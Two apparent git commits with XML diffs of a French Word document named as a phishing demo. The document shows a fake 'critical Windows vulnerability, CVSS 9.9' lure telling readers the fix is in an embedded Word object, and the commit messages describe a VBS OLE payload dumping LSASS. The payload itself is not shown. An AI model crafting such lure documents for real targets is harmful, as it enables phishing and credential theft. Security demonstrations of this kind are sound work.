<commit_message>
Phishing demo dumping LSASS Windows process
</commit_message>
<xml_diff>
--- a/demo-phishing.docx
+++ b/demo-phishing.docx
@@ -12,80 +12,112 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>Vulnérabilité Cisco critique, CVSS score 9.9</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>Le correctif est expliqué dans le fichier Word ci-dessous :</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-        <w:object>
+        <w:t>Vulnérabilité Microsoft Windows critique, CVSS score 9.9</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>La mis en place du correctif est bien expliqué</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>e</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> dans le fichier Word ci-dessous :</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:object w:dxaOrig="1387" w:dyaOrig="758">
           <v:shape id="ole_rId2" style="width:72.05pt;height:63.5pt" o:ole="">
             <v:imagedata r:id="rId3" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="" ShapeID="ole_rId2" DrawAspect="Content" ObjectID="_1977406318" r:id="rId2"/>
+          <o:OLEObject Type="Embed" ProgID="" ShapeID="ole_rId2" DrawAspect="Content" ObjectID="_2134880592" r:id="rId2"/>
         </w:object>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
       </w:r>
     </w:p>
     <w:p>

</xml_diff>

<commit_message>
VBS OLE link into Word Document
</commit_message>
<xml_diff>
--- a/demo-phishing.docx
+++ b/demo-phishing.docx
@@ -40,21 +40,7 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>La mis en place du correctif est bien expliqué</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t>e</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> dans le fichier Word ci-dessous :</w:t>
+        <w:t>La mis en place du correctif est expliquée dans le fichier Word ci-dessous :</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -101,23 +87,8 @@
           <v:shape id="ole_rId2" style="width:72.05pt;height:63.5pt" o:ole="">
             <v:imagedata r:id="rId3" o:title=""/>
           </v:shape>
-          <o:OLEObject Type="Embed" ProgID="" ShapeID="ole_rId2" DrawAspect="Content" ObjectID="_2134880592" r:id="rId2"/>
+          <o:OLEObject Type="Embed" ProgID="" ShapeID="ole_rId2" DrawAspect="Content" ObjectID="_889043925" r:id="rId2"/>
         </w:object>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
       </w:r>
     </w:p>
     <w:p>

</xml_diff>